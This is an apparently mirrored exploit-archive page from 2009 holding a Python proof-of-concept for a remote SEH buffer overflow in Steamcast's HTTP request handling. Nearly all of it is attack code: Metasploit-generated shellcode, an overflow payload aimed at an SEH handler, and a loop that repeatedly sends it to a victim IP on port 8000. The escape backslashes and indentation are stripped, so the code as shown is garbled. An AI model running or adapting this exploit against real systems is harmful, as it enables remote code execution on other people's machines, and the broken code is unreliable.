[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [1]
# Published : 2009-04-13
# Author : His0k4
# Previous Title : ftpdmin 0.96 Arbitrary File Disclosure Exploit
# Next Title : Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]
#!/usr/bin/python
#[*] Usage : steamcast.py [victime_ip]
#[*] Bug : Steamcast(HTTP Request) Remote Buffer Overflow Exploit (SEH) [1]
#[*] Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln.
#[*] Tested on : Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D
#[*] Translate by Cyb3r-1st : esse7 embe7 embou :p
#Note : The problem is that we need to find a dll wich its not compiled with GS, in my case i founded idmmbc its a loaded dll of internet download manager so try to find an unsafe dll.
import sys, socket
import struct
host = sys.argv[1]
port = 8000
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xc6"
"x90xb4x70x83xebxfcxe2xf4x3ax78xf0x70xc6x90x3fx35"
"xfax1bxc8x75xbex91x5bxfbx89x88x3fx2fxe6x91x5fx39"
"x4dxa4x3fx71x28xa1x74xe9x6ax14x74x04xc1x51x7ex7d"
"xc7x52x5fx84xfdxc4x90x74xb3x75x3fx2fxe2x91x5fx16"
"x4dx9cxffxfbx99x8cxb5x9bx4dx8cx3fx71x2dx19xe8x54"
"xc2x53x85xb0xa2x1bxf4x40x43x50xccx7cx4dxd0xb8xfb"
"xb6x8cx19xfbxaex98x5fx79x4dx10x04x70xc6x90x3fx18"
"xfaxcfx85x86xa6xc6x3dx88x45x50xcfx20xaex60x3ex74"
"x99xf8x2cx8ex4cx9exe3x8fx21xf3xd5x1cxa5x90xb4x70")
exploit = "x41"*1003 + "xEBx06x90x90" + "xDBx27x02x10" + "x90"*20 + shellcode
while 1:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
head = "GET / HTTP/1.1rn"
head += "Host: "+host+"rn"
head += exploit+"rn"
head += "rnrn"
s.send(head)
# www.Syue.com [2009-04-13]